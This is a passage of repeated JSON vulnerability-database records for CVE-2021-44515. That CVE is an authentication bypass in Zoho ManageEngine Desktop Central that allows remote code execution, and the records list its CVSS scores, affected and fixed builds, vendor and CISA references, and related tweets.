"cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T02:08:23", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 37}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T02:25:44", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T02:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T02:25:44", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 38}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T02:55:34", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T02:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T02:55:34", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 39}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T02:55:45", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T02:55:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T02:55:45", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 40}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T03:25:34", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T02:55:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T03:25:34", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 41}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T03:25:44", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T03:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability 